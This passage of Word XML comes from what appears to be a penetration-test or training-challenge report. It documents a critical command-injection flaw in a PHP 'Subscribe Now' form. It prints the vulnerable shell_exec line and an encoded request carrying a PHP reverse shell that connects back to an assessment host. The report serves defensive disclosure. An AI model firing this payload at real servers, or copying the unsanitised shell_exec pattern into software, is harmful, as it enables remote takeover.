            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F02EB73" w14:textId="10E71877" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Not Provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E0F5C09" w14:textId="3E5F4580" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Vendor-hosted VPN for NBN employees.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="744B3729" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00A2467D" w14:textId="6A9EE5E4" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Physical Office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66412D75" w14:textId="46853DD7" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5665" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D79CA1A" w14:textId="38A142BF" w:rsidR="00663942" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00FD4229">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>NBN Office locations</w:t>
            </w:r>
            <w:r w:rsidR="007E1592" w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="206D0D11" w14:textId="77777777" w:rsidR="004F68CB" w:rsidRDefault="004F68CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="2A0046" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc129370244"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB3E752" w14:textId="1FD847D6" w:rsidR="00646037" w:rsidRDefault="0052786E" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc129370249"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Challenge</w:t>
      </w:r>
      <w:r w:rsidR="00646037">
        <w:t xml:space="preserve"> Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9E80BB" w14:textId="626A69A2" w:rsidR="00646037" w:rsidRPr="001215EC" w:rsidRDefault="0052786E" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Challenge Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A560F6A" w14:textId="029A5710" w:rsidR="00646037" w:rsidRPr="006F5E52" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1646"/>
        <w:gridCol w:w="2399"/>
        <w:gridCol w:w="5305"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DA733E" w:rsidRPr="005264D0" w14:paraId="799D81CF" w14:textId="77777777" w:rsidTr="000F477A">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57B298D1" w14:textId="6743EBB2" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA733E" w:rsidRPr="005264D0" w14:paraId="4149CF9C" w14:textId="77777777" w:rsidTr="003C17E2">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1646" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7030A0"/>
          </w:tcPr>
          <w:p w14:paraId="2A89D404" w14:textId="4DA8C90C" w:rsidR="00DA733E" w:rsidRPr="00DA733E" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Critical Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D3B5E9"/>
          </w:tcPr>
          <w:p w14:paraId="07C455B7" w14:textId="0D4B7292" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D3B5E9"/>
          </w:tcPr>
          <w:p w14:paraId="04977400" w14:textId="6360EA1E" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA733E" w:rsidRPr="005264D0" w14:paraId="4436DBB1" w14:textId="77777777" w:rsidTr="003C17E2">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1646" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="7030A0"/>
          </w:tcPr>
          <w:p w14:paraId="47AE6292" w14:textId="76558416" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6748E604" w14:textId="27D58FFB" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08085F26" w14:textId="1C41BA5F" w:rsidR="00DA733E" w:rsidRPr="005264D0" w:rsidRDefault="00DA733E" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA733E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="118E6A3B" w14:textId="6EAC2DBC" w:rsidR="00343A40" w:rsidRPr="00DA733E" w:rsidRDefault="00646037" w:rsidP="007B579A">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidR="00DA733E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343A40" w:rsidRPr="00343A40">
        <w:t>OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server running an application and typically fully compromise the application and all its data. An attacker can often leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D08977" w14:textId="77A76EF0" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00DA733E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E948598" w14:textId="19450684" w:rsidR="00DA733E" w:rsidRPr="003C17E2" w:rsidRDefault="00DA733E" w:rsidP="001215EC">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:t>http://10.10.0.66/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB4B3AC" w14:textId="5E173CE9" w:rsidR="00DA733E" w:rsidRPr="003C17E2" w:rsidRDefault="00DA733E" w:rsidP="00DA733E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> URL parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C4CC8F" w14:textId="02203939" w:rsidR="00DA733E" w:rsidRPr="003C17E2" w:rsidRDefault="00DA733E" w:rsidP="00DA733E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>ema</w:t>
      </w:r>
      <w:r w:rsidR="001215EC" w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>il</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001215EC" w:rsidRPr="003C17E2">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02AFD9" w14:textId="77777777" w:rsidR="001215EC" w:rsidRPr="003C17E2" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C6F4A0" w14:textId="049287B6" w:rsidR="001215EC" w:rsidRPr="003C17E2" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:t>http://10.10.0.66:8001/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7902AF73" w14:textId="77777777" w:rsidR="001215EC" w:rsidRPr="003C17E2" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> URL parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7711D62B" w14:textId="77777777" w:rsidR="001215EC" w:rsidRPr="003C17E2" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> URL parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F40DED" w14:textId="77777777" w:rsidR="001215EC" w:rsidRDefault="001215EC" w:rsidP="001215EC">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58832ACD" w14:textId="1D44DCDE" w:rsidR="00646037" w:rsidRPr="006F5E52" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1370FF0A" w14:textId="3119635D" w:rsidR="001215EC" w:rsidRDefault="006F5E52" w:rsidP="001215EC">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="003C17E2">
        <w:t>“Subscribe Now” box in the web application allows users to enter their name and email address to sign up for the NBN network, as shown below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7603B6" w14:textId="5649F38D" w:rsidR="003C17E2" w:rsidRDefault="003C17E2" w:rsidP="003C17E2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3975CAEA" wp14:editId="157C4EA5">
            <wp:extent cx="4533900" cy="2428072"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="10795"/>
            <wp:docPr id="98972807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28070" name="Picture 1" descr="Graphical user interface, text, application, email&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId10"/>
                    <a:srcRect r="3044" b="4443"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4541888" cy="2432350"/>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r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Subscribe Now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2798EC0E" w14:textId="39967FE7" w:rsidR="003C17E2" w:rsidRDefault="003C17E2" w:rsidP="003C17E2">
      <w:r>
        <w:t xml:space="preserve">After the user inputs their name and email address, the application writes it to the customer list file by using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C17E2">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function, shown in the following line of code:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C17E2" w14:paraId="04CCEB25" w14:textId="77777777" w:rsidTr="003C17E2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7CCDF8C0" w14:textId="5F8FD78F" w:rsidR="003C17E2" w:rsidRDefault="003C17E2" w:rsidP="003C17E2">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>shell_exec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>( "echo '" . $_GET['email'] . " : " . $_GET['name'] . " //// ' &gt;&gt;  /var/www/html/data/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>customer.list</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> " );</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D8333EC" w14:textId="5FD5F9B6" w:rsidR="003C17E2" w:rsidRDefault="003C17E2" w:rsidP="003C17E2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Write Email and Name To List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8A248" w14:textId="6380672E" w:rsidR="00DA7649" w:rsidRPr="00AC67FD" w:rsidRDefault="003C17E2" w:rsidP="00AC67FD">
      <w:r>
        <w:t xml:space="preserve">Because the function places the user inputs into the string to be executed by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function without sanitization, an attacker can use specially crafted input to escape the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA7649">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command and execute arbitrary commands on the server</w:t>
      </w:r>
      <w:r w:rsidR="00DA7649">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C566FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00033EC8">
        <w:t xml:space="preserve">The Hyperthetical team was able to use this vulnerability to get a reverse shell on </w:t>
      </w:r>
      <w:r w:rsidR="00033EC8" w:rsidRPr="00033EC8">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidR="00033EC8">
        <w:t xml:space="preserve"> in the context of the </w:t>
      </w:r>
      <w:r w:rsidR="00033EC8" w:rsidRPr="00033EC8">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="00033EC8">
        <w:t xml:space="preserve"> user. The below request contains an encoded PHP reverse shell payload</w:t>
      </w:r>
      <w:r w:rsidR="00F66181">
        <w:t xml:space="preserve"> that caused the server to connect back to the assessment team’s jump host.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DA7649" w14:paraId="04495541" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="2274CF2B" w14:textId="7FF9A82A" w:rsidR="00DA7649" w:rsidRPr="0055639E" w:rsidRDefault="00033EC8" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET /?name=test&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>email=test'%20%26%20php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.0.10%22%2C31337%29%3B%60%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%60%3B%27%3b%29%23</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="763C576B" w14:textId="77777777" w:rsidR="00DA7649" w:rsidRPr="0055639E" w:rsidRDefault="00DA7649" w:rsidP="00DA7649">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
